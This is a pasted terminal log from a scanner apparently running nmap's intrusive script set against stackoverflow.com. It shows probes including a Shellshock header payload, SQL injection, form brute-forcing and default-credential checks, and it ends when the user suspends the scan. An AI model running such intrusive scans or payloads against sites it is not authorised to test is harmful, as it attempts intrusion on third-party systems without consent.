  3372. NSE: [http-shellshock 151.101.65.69:80] Sending '() { :;}; echo; echo "WGOJTNRNBLYYSHT"' in HTTP headers:User-Agent,Cookie and Referer
  3373. NSE: Starting http-rfi-spider against stackoverflow.com (151.101.65.69:443).
  3374. NSE: Starting http-form-brute against stackoverflow.com (151.101.65.69:443).
  3375. NSE: Starting http-awstatstotals-exec against stackoverflow.com (151.101.65.69:443).
  3376. NSE: Starting http-dombased-xss against stackoverflow.com (151.101.65.69:80).
  3377. NSE: Starting http-config-backup against stackoverflow.com (151.101.65.69:443).
  3378. NSE: Starting http-unsafe-output-escaping against stackoverflow.com (151.101.65.69:80).
  3379. NSE: Starting http-sql-injection against stackoverflow.com (151.101.65.69:80).
  3380. NSE: Starting http-put against stackoverflow.com (151.101.65.69:80).
  3381. NSE: Finished http-put against stackoverflow.com (151.101.65.69:80).
  3382. NSE: [http-majordomo2-dir-traversal 151.101.65.69:443] http.request socket error: ERROR
  3383. NSE: Finished http-majordomo2-dir-traversal against stackoverflow.com (151.101.65.69:443).
  3384. NSE: [http-drupal-enum-users 151.101.65.69:80] No answers from pipelined requests
  3385. NSE: Finished http-drupal-enum-users against stackoverflow.com (151.101.65.69:80).tp-brute against stackoverflow.com (151.101.65.69:80).
  3386. NSE: [http-unsafe-output-escaping 151.101.65.69:443] http.request socket error: ERROR
  3387. NSE: [http-config-backup 151.101.65.69:80] Unexpected response returned for 404 check: creating socket.
  3388. NSE: [http-iis-webdav-vuln 151.101.65.69:80] http.request socket error: sorry, you don't have OpenSSL
  3389. NSE: [http-iis-webdav-vuln 151.101.65.69:80] Root folder is not password protected, continuing...
  3390. NSE: [http-vuln-cve2009-3960 151.101.65.69:443] http.request socket error: ERROR
  3391. NSE: [http-default-accounts 151.101.65.69:80] http.request socket error: sorry, you don't have OpenSSL
  3392. NSE: [http-default-accounts 151.101.65.69:80] Unexpected response returned for 404 check: creating socket.
  3393. NSE: [http-default-accounts 151.101.65.69:80] Loading fingerprints: /usr/local/bin/../share/nmap/nselib/data/http-default-accounts-fingerprints.lua
  3394. NSE: [http-default-accounts 151.101.65.69:80] 50 fingerprints were loaded
  3395. NSE: [http-default-accounts 151.101.65.69:80] Trying known locations under path '' (change with 'http-default-accounts.basepath' argument)
  3396. NSE: [http-default-accounts 151.101.65.69:80] Total number of pipelined requests: 17
  3397.  
  3398. D
  3399.  
  3400. Debugging Decreased to 0.
  3401.  
  3402. ctrl z
  3403.  
  3404. [2]+  Stopped                 nmap --script intrusive stackoverflow.com
  3405. SixMillionKilaTons:run osx$
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement